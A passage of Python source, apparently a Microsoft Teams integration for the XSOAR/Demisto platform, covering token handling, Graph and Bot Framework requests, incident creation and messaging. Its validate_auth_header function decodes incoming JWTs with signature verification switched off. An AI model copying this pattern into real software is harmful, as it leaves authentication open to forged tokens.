error_description: str = response.get('error_description', '')
if error_description:
return error_description
# If no error message
raise ValueError()
except ValueError:
return resp_err.text
def translate_severity(severity: str) -> int:
"""
Translates Demisto text severity to int severity
:param severity: Demisto text severity
:return: Demisto integer severity
"""
severity_dictionary = {
'Unknown': 0,
'Low': 1,
'Medium': 2,
'High': 3,
'Critical': 4
}
return severity_dictionary.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
"""
Creates incidents according to a provided JSON object
:param demisto_user: The demisto user associated with the request (if exists)
:param incidents: The incidents JSON
:return: The creation result
"""
if demisto_user:
data = demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
else:
data = demisto.createIncidents(incidents)
return data
def process_incident_create_message(demisto_user: dict, message: str) -> str:
"""
Processes an incident creation message
:param demisto_user: The Demisto user associated with the message (if exists)
:param message: The creation message
:return: Creation result
"""
json_pattern: str = r'(?<=json=).*'
name_pattern: str = r'(?<=name=).*'
type_pattern: str = r'(?<=type=).*'
json_match: Optional[Match[str]] = re.search(json_pattern, message)
created_incident: Union[dict, list]
data: str = str()
if json_match:
if re.search(name_pattern, message) or re.search(type_pattern, message):
data = 'No other properties other than json should be specified.'
else:
incidents_json: str = json_match.group()
incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
if not isinstance(incidents, list):
incidents = [incidents]
created_incident = create_incidents(demisto_user, incidents)
if not created_incident:
data = 'Failed creating incidents.'
else:
name_match: Optional[Match[str]] = re.search(name_pattern, message)
if not name_match:
data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
else:
incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
incident_type: str = str()
type_match: Optional[Match[str]] = re.search(type_pattern, message)
if type_match:
incident_type = re.sub('name=.*', '', type_match.group()).strip()
incident: dict = {'name': incident_name}
incident_type = incident_type or INCIDENT_TYPE
if incident_type:
incident['type'] = incident_type
created_incident = create_incidents(demisto_user, [incident])
if not created_incident:
data = 'Failed creating incidents.'
if created_incident:
if isinstance(created_incident, list):
created_incident = created_incident[0]
created_incident = cast(Dict[Any, Any], created_incident)
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
return data
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
"""
Checks if investigation is already mirrored
:param investigation_id: Investigation ID to check if mirrored
:param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
:return: Index in mirrored channels list if mirrored, else -1
"""
for index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
return index
return -1
def urlify_hyperlinks(message: str) -> str:
"""
Turns URL to markdown hyper-link
e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
:param message: Message to look for URLs in
:return: Formatted message with hyper-links
"""
formatted_message: str = message
# URLify markdown hyperlinks
urls = re.findall(URL_REGEX, message)
for url in urls:
formatted_message = formatted_message.replace(url, f'[{url}]({url})')
return formatted_message
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
"""
Searches for a team member
:param integration_context: Cached object to search for team member in
:param team_member_id: Team member ID to search for
:return: Found team member object
"""
team_member: dict = dict()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for member in team_members:
if member.get('id') == team_member_id:
team_member['username'] = member.get('name', '')
team_member['user_email'] = member.get('userPrincipalName', '')
return team_member
raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
"""
Gets team member ID based on name, email or principal name
:param requested_team_member: Team member name / principal name / email to look for
:param integration_context: Cached object to search for team member in
:return: Team member ID
"""
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for team_member in team_members:
if requested_team_member in {team_member.get('name', ''), team_member.get('userPrincipalName', '')}:
return team_member.get('id')
raise ValueError(f'Team member {requested_team_member} was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
"""
Creates Microsoft Teams adaptive card object given body and actions
:param body: Adaptive card data
:param actions: Adaptive card actions
:return: Adaptive card object
"""
adaptive_card: dict = {
'contentType': 'application/vnd.microsoft.card.adaptive',
'content': {
'$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
'version': '1.0',
'type': 'AdaptiveCard',
'body': body
}
}
if actions:
adaptive_card['content']['actions'] = actions
return adaptive_card
def process_tasks_list(data_by_line: list) -> dict:
"""
Processes tasks list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of tasks to process
:return: Adaptive card of assigned tasks
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'Task:',
'value': split_data[0]
},
{
'title': 'Incident:',
'value': split_data[1]
},
{
'title': 'Due:',
'value': split_data[2]
},
{
'title': 'Link:',
'value': f'[{split_data[3]}]({split_data[3]})'
}
]
})
return create_adaptive_card(body)
def process_incidents_list(data_by_line: list) -> dict:
"""
Processes incidents list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of incidents to process
:return: Adaptive card of assigned incidents
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'ID:',
'value': split_data[0]
},
{
'title': 'Name:',
'value': split_data[1]
},
{
'title': 'Status:',
'value': split_data[2]
},
{
'title': 'Type:',
'value': split_data[3]
},
{
'title': 'Owner:',
'value': split_data[4]
},
{
'title': 'Created:',
'value': split_data[5]
},
{
'title': 'Link:',
'value': f'[{split_data[6]}]({split_data[6]})'
}
]
})
return create_adaptive_card(body)
def process_mirror_or_unknown_message(message: str) -> dict:
"""
Processes mirror investigation command or unknown direct message and creates adaptive card
:param message: The direct message to process
:return: Adaptive card of mirror response / unknown message
"""
body: list = [{
'type': 'TextBlock',
'text': message.replace('\n', '\n\n'),
'wrap': True
}]
return create_adaptive_card(body)
def process_ask_user(message: str) -> dict:
"""
Processes ask user message and creates adaptive card
:param message: The question object
:return: Adaptive card of the question to send
"""
message_object: dict = json.loads(message)
text: str = message_object.get('message_text', '')
entitlement: str = message_object.get('entitlement', '')
options: list = message_object.get('options', [])
investigation_id: str = message_object.get('investigation_id', '')
task_id: str = message_object.get('task_id', '')
body = [
{
'type': 'TextBlock',
'text': text
}
]
actions: list = list()
for option in options:
actions.append({
'type': 'Action.Submit',
'title': option,
'data': {
'response': option,
'entitlement': entitlement,
'investigation_id': investigation_id,
'task_id': task_id
}
})
return create_adaptive_card(body, actions)
def get_bot_access_token() -> str:
"""
Retrieves Bot Framework API access token, either from cache or from Microsoft
:return: The Bot Framework API access token
"""
integration_context: dict = get_integration_context()
access_token: str = integration_context.get('bot_access_token', '')
valid_until: int = integration_context.get('bot_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'client_secret': BOT_PASSWORD,
'scope': 'https://api.botframework.com/.default'
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response, 'bot')
raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['bot_access_token'] = access_token
integration_context['bot_valid_until'] = time_now + expires_in
set_integration_context(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
"""
Retrieves Microsoft Graph API access token, either from cache or from Microsoft
:return: The Microsoft Graph API access token
"""
integration_context: dict = get_integration_context()
access_token: str = integration_context.get('graph_access_token', '')
valid_until: int = integration_context.get('graph_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
)
url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'scope': 'https://graph.microsoft.com/.default',
'client_secret': BOT_PASSWORD
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response)
raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['graph_access_token'] = access_token
integration_context['graph_valid_until'] = time_now + expires_in
set_integration_context(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get Graph access token')
def http_request(
method: str, url: str = '', json_: dict = None, api: str = 'graph', params: Optional[Dict] = None
) -> Union[dict, list]:
"""A wrapper for requests lib to send our requests and handle requests and responses better
Headers to be sent in requests
Args:
method (str): any restful method
url (str): URL to query
json_ (dict): HTTP JSON body
api (str): API to query (graph/bot)
params (dict): Object of key-value URL query parameters
Returns:
Union[dict, list]: The response in list or dict format.
"""
if api == 'graph':
access_token = get_graph_access_token()
else: # Bot Framework API
access_token = get_bot_access_token()
headers: dict = {
'Authorization': f'Bearer {access_token}',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
try:
response: requests.Response = requests.request(
method,
url,
headers=headers,
json=json_,
verify=USE_SSL,
params=params,
)
if not response.ok:
error: str = error_parser(response, api)
raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
if response.status_code in {202, 204}:
# Delete channel or remove user from channel return 204 if successful
# Update message returns 202 if the request has been accepted for processing
return {}
if response.status_code == 201:
# For channel creation query, we get a body in the response, otherwise we should just return
if not response.content:
return {}
try:
return response.json()
except ValueError:
raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
except requests.exceptions.ConnectTimeout:
error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
'accessible from your host.'
raise ConnectionError(error_message)
except requests.exceptions.SSLError:
error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
'the integration configuration.'
raise ConnectionError(error_message)
except requests.exceptions.ProxyError:
error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
'selected, try deselecting it.'
raise ConnectionError(error_message)
def integration_health():
bot_framework_api_health = 'Operational'
graph_api_health = 'Operational'
try:
get_bot_access_token()
except ValueError as e:
bot_framework_api_health = f'Non operational - {str(e)}'
try:
get_graph_access_token()
except ValueError as e:
graph_api_health = f'Non operational - {str(e)}'
api_health_output: list = [{
'Bot Framework API Health': bot_framework_api_health,
'Graph API Health': graph_api_health
}]
adi_health_human_readable: str = tableToMarkdown('Microsoft API Health', api_health_output)
mirrored_channels_output = list()
integration_context: dict = get_integration_context()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
mirrored_channels_output.append({
'Team': team.get('team_name'),
'Channel': channel.get('channel_name'),
'Investigation ID': channel.get('investigation_id')
})
mirrored_channels_human_readable: str
if mirrored_channels_output:
mirrored_channels_human_readable = tableToMarkdown(
'Microsoft Teams Mirrored Channels', mirrored_channels_output
)
else:
mirrored_channels_human_readable = 'No mirrored channels.'
demisto.results({
'ContentsFormat': formats['json'],
'Type': entryTypes['note'],
'HumanReadable': adi_health_human_readable + mirrored_channels_human_readable,
'Contents': adi_health_human_readable + mirrored_channels_human_readable
})
def validate_auth_header(headers: dict) -> bool:
"""
Validated authorization header provided in the bot activity object
:param headers: Bot activity headers
:return: True if authorized, else False
"""
parts: list = headers.get('Authorization', '').split(' ')
if len(parts) != 2:
return False
scehma: str = parts[0]
jwt_token: str = parts[1]
if scehma != 'Bearer' or not jwt_token:
demisto.info('Authorization header validation - failed to verify schema')
return False
decoded_payload: dict = jwt.decode(jwt=jwt_token, options={'verify_signature': False})
issuer: str = decoded_payload.get('iss', '')
if issuer != 'https://api.botframework.com':
demisto.info('Authorization header validation - failed to verify issuer')
return False
integration_context: dict = get_integration_context()
open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
keys: list = open_id_metadata.get('keys', [])
unverified_headers: dict = jwt.get_unverified_header(jwt_token)
key_id: str = unverified_headers.get('kid', '')
key_object: dict = dict()
# Check if we got the requested key in cache
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in cache, getting new keys
try:
open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
if not response.ok:
demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
return False
response_json: dict = response.json()
jwks_uri: str = response_json.get('jwks_uri', '')
keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
if not keys_response.ok:
demisto.info(f'Authorization header validation failed to fetch keys - {response.reason}')
return False
keys_response_json: dict = keys_response.json()
keys = keys_response_json.get('keys', [])
open_id_metadata['keys'] = keys
except ValueError:
demisto.info('Authorization header validation - failed to parse keys response')
return False
if not keys:
# Didn't get new keys
demisto.info('Authorization header validation - failed to get keys')
return False
# Find requested key in new keys
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in new keys
demisto.info('Authorization header validation - failed to find relevant key')
return False
endorsements: list = key_object.get('endorsements', [])
if not endorsements or 'msteams' not in endorsements:
demisto.info('Authorization header validation - failed to verify endorsements')
return False
public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
options = {
'verify_aud': False,
'verify_exp': True,
'verify_signature': False,
}
decoded_payload = jwt.decode(jwt_token, public_key, options=options)
audience_claim: str = decoded_payload.get('aud', '')
if audience_claim != demisto.params().get('bot_id'):
demisto.info('Authorization header validation - failed to verify audience_claim')
return False
integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
set_integration_context(integration_context)
return True
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
"""
Gets Team AAD ID
:param team_name: Team name to get AAD ID of
:return: team AAD ID
"""
integration_context: dict = get_integration_context()
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team_name == team.get('team_name', ''):
return team.get('team_aad_id', '')
url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
response: dict = cast(Dict[Any, Any], http_request('GET', url))
teams = response.get('value', [])
for team in teams:
if team.get('displayName', '') == team_name:
return team.get('id', '')
raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_user(user: str) -> list:
"""Retrieves the AAD ID of requested user
Args:
user (str): Display name/mail/UPN of user to get ID of.
Return:
list: List containing the requsted user object
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users'
params = {
'$filter': f"displayName eq '{user}' or mail eq '{user}' or userPrincipalName eq '{user}'",
'$select': 'id'
}
users = cast(Dict[Any, Any], http_request('GET', url, params=params))
return users.get('value', [])
def add_user_to_channel(team_aad_id: str, channel_id: str, user_id: str):
"""
Request for adding user to channel
"""
url: str = f'{GRAPH_BASE_URL}/beta/teams/{team_aad_id}/channels/{channel_id}/members'
requestjson_: dict = {
'@odata.type': '#microsoft.graph.aadUserConversationMember',
'roles': [],
'user@odata.bind': f'https://graph.microsoft.com/beta/users/{user_id}' # disable-secrets-detection
}
http_request('POST', url, json_=requestjson_)
def add_user_to_channel_command():
"""
Add user to channel (private channel only as still in beta mode)
"""
channel_name: str = demisto.args().get('channel', '')
team_name: str = demisto.args().get('team', '')
member = demisto.args().get('member', '')
user: list = get_user(member)
if not (user and user[0].get('id')):
raise ValueError(f'User {member} was not found')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id=None)
add_user_to_channel(team_aad_id, channel_id, user[0].get('id'))
demisto.results(f'The User "{member}" has been added to channel "{channel_name}" successfully.')
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
"""
Creates a Microsoft Teams channel
:param team_aad_id: Team AAD ID to create channel in
:param channel_name: Name of channel to create
:param channel_description: Description of channel to create
:return: ID of created channel
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
request_json: dict = {
'displayName': channel_name,
'description': channel_description
}
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
channel_id: str = channel_data.get('id', '')
return channel_id
def create_meeting(user_id: str, subject: str, start_date_time: str, end_date_time: str) -> dict:
"""
Creates a Microsoft Teams meeting
:param user_id: The User's ID
:param subject: The meeting's subject
:param start_date_time: The meeting's start time
:param end_date_time: The meeting's end time
:return: Dict with info about the created meeting.
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users/{user_id}/onlineMeetings'
request_json: dict = {
'subject': subject
}
if start_date_time:
request_json['startDateTime'] = start_date_time
if end_date_time:
request_json['endDateTime'] = end_date_time
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
return channel_data
def create_channel_command():
channel_name: str = demisto.args().get('channel_name', '')
channel_description: str = demisto.args().get('description', '')
team_name: str = demisto.args().get('team', '')
team_aad_id = get_team_aad_id(team_name)
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
if channel_id:
demisto.results(f'The channel "{channel_name}" was created successfully')
def create_meeting_command():
subject: str = demisto.args().get('subject', '')
start_date_time: str = demisto.args().get('start_time', '')
end_date_time: str = demisto.args().get('end_time', '')
member = demisto.args().get('member', '')
user: list = get_user(member)
if not (user and user[0].get('id')):
raise ValueError(f'User {member} was not found')
meeting_data: dict = create_meeting(user[0].get('id'), subject, start_date_time, end_date_time)
thread_id = ''
message_id = ''
if chat_info := meeting_data.get('chatInfo', {}):
thread_id = chat_info.get('threadId', '')
message_id = chat_info.get('messageId', '')
participant_id, participant_display_name = get_participant_info(meeting_data.get('participants', {}))
outputs = {
'creationDateTime': meeting_data.get('creationDateTime', ''),
'threadId': thread_id,
'messageId': message_id,
'id': meeting_data.get('id', ''),
'joinWebUrl': meeting_data.get('joinWebUrl', ''),
'participantId': participant_id,
'participantDisplayName': participant_display_name
}
result = CommandResults(
readable_output=f'The meeting "{subject}" was created successfully',
outputs_prefix='MicrosoftTeams.CreateMeeting',
outputs_key_field='id',
outputs=outputs
)
return_results(result)
def get_participant_info(participants: dict) -> Tuple[str, str]:
"""
Retrieves the participant ID and name
:param participants: The participants in the Team meeting
:return: The participant ID and name
"""
participant_id = ''
participant_display_name = ''
if participants:
user = participants.get('organizer', {}).get('identity', {}).get('user', {})
if user:
participant_id = user.get('id')
participant_display_name = user.get('displayName')
return participant_id, participant_display_name
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
"""
Retrieves Microsoft Teams channel ID
:param channel_name: Name of channel to get ID of
:param team_aad_id: AAD ID of team to search channel in
:param investigation_id: Demisto investigation ID to search mirrored channel of
:return: Requested channel ID
"""
investigation_id = investigation_id or str()
integration_context: dict = get_integration_context()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
if channel.get('channel_name') == channel_name or channel.get('investigation_id') == investigation_id:
return channel.get('channel_id')
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
response: dict = cast(Dict[Any, Any], http_request('GET', url))
channel_id: str = ''
channels: list = response.get('value', [])
for channel in channels:
channel_display_name: str = channel.get('displayName', '')
if channel_display_name == channel_name:
channel_id = channel.get('id', '')
break
if not channel_id:
raise ValueError(f'Could not find channel: {channel_name}')
return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
"""
Retrieves team members given a team
:param team_id: ID of team to get team members of
:param service_url: Bot service URL to query
:return: List of team members
"""
url: str = f'{service_url}/v3/conversations/{team_id}/members'
response: list = cast(List[Any], http_request('GET', url, api='bot'))
return response
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
"""
Updates a message in Microsoft Teams channel
:param service_url: Bot service URL to query
:param conversation_id: Conversation ID of message to update
:param activity_id: Activity ID of message to update
:param text: Text to update in the message
:return: None
"""
body = [{
'type': 'TextBlock',
'text': text
}]
adaptive_card: dict = create_adaptive_card(body=body)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
http_request('PUT', url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
"""
Sends an HTTP request to close a Microsoft Teams channel
:param team_aad_id: AAD ID of team to close the channel in
:param channel_id: ID of channel to close
:return: None
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}'
http_request('DELETE', url)
def close_channel():
"""
Deletes a mirrored Microsoft Teams channel
"""
integration_context: dict = get_integration_context()
channel_name: str = demisto.args().get('channel', '')
investigation: dict = demisto.investigation()
investigation_id: str = investigation.get('id', '')
channel_id: str = str()
team_aad_id: str
mirrored_channels: list
if not channel_name:
# Closing channel as part of autoclose in mirroring process
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_aad_id = team.get('team_aad_id', '')
mirrored_channels = team.get('mirrored_channels', [])
for channel_index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
channel_id = channel.get('channel_id', '')
close_channel_request(team_aad_id, channel_id)
mirrored_channels.pop(channel_index)
team['mirrored_channels'] = mirrored_channels
break
if not channel_id:
raise ValueError('Could not find Microsoft Teams channel to close.')
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
else:
team_name: str = demisto.args().get('team') or demisto.params().get('team')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
close_channel_request(team_aad_id, channel_id)
demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
"""
Create a personal conversation with a team member
:param integration_context: Cached object to retrieve relevant data for the conversation creation
:param team_member_id: ID of team member to create a conversation with
:return: ID of created conversation
"""
bot_id: str = demisto.params().get('bot_id', '')
bot_name: str = integration_context.get('bot_name', '')
tenant_id: str = integration_context.get('tenant_id', '')
conversation: dict = {
'bot': {
'id': f'28:{bot_id}',
'name': bot_name
},
'members': [{
'id': team_member_id
}],
'channelData': {
'tenant': {
'id': tenant_id
}
}
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
url: str = f'{service_url}/v3/conversations'
response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=conversation, api='bot'))
return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
"""
Sends an HTTP request to send message to Microsoft Teams
:param channel_id: ID of channel to send message in
:param conversation: Conversation message object to send
:param service_url: Bot service URL to query
:return: None
"""
url: str = f'{service_url}/v3/conversations/{channel_id}/activities'
http_request('POST', url, json_=conversation, api='bot')
def process_mentioned_users_in_message(message: str) -> Tuple[list, str]:
"""
Processes the message to include all mentioned users in the right format. For example:
Input: 'good morning @Demisto'
Output (Formatted message): 'good morning <at>@Demisto</at>'
:param message: The message to be processed
:return: A list of the mentioned users, The processed message
"""
mentioned_users: list = [''.join(user) for user in re.findall(MENTION_REGEX, message)]
for user in mentioned_users:
message = message.replace(f'@{user};', f'<at>@{user}</at>')
return mentioned_users, message
def mentioned_users_to_entities(mentioned_users: list, integration_context: dict) -> list:
"""
Returns a list of entities built from the mentioned users
:param mentioned_users: A list of mentioned users in the message
:param integration_context: Cached object to retrieve relevant data from
:return: A list of entities
"""
return [{'type': 'mention', 'mentioned': {'id': get_team_member_id(user, integration_context), 'name': user},
'text': f'<at>@{user}</at>'} for user in mentioned_users]
def send_message():
message_type: str = demisto.args().get('messageType', '')
original_message: str = demisto.args().get('originalMessage', '')
message: str = demisto.args().get('message', '')
try:
adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
except ValueError:
raise ValueError('Given adaptive card is not in valid JSON format.')
if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
# Got a message which was already mirrored - skipping it
return
channel_name: str = demisto.args().get('channel', '')
if (not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}) \
or channel_name == INCIDENT_NOTIFICATIONS_CHANNEL:
# Got a notification from server
channel_name = demisto.params().get('incident_notifications_channel', 'General')
severity: int = int(demisto.args().get('severity'))
severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
if severity < severity_threshold:
return
team_member: str = demisto.args().get('team_member', '') or demisto.args().get('to', '')
if not (team_member or channel_name):
raise ValueError('No channel or team member to send message were provided.')
if team_member and channel_name:
raise ValueError('Provide either channel or team member to send message to, not both.')
if not (message or adaptive_card):
raise ValueError('No message or adaptive card to send were provided.')
if message and adaptive_card:
raise ValueError('Provide either message or adaptive to send, not both.')
integration_context: dict = get_integration_context()
channel_id: str = str()
personal_conversation_id: str = str()
if channel_name:
team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
investigation_id: str = str()
if message_type == MESSAGE_TYPES['mirror_entry']:
# Got an entry from the War Room to mirror to Teams
# Getting investigation ID in case channel name is custom and not the default
investigation: dict = demisto.investigation()
investigation_id = investigation.get('id', '')
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
elif team_member:
team_member_id: str = get_team_member_id(team_member, integration_context)
personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
recipient: str = channel_id or personal_conversation_id
conversation: dict
if message:
entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
if entitlement_match:
# In TeamsAsk process
adaptive_card = process_ask_user(message)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
else:
# Sending regular message
formatted_message: str = urlify_hyperlinks(message)
mentioned_users, formatted_message_with_mentions = process_mentioned_users_in_message(formatted_message)
entities = mentioned_users_to_entities(mentioned_users, integration_context)
demisto.info(f'msg: {formatted_message_with_mentions}, ent: {entities}')
conversation = {
'type': 'message',
'text': formatted_message_with_mentions,
'entities': entities
}
else: # Adaptive card
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, recipient, conversation)
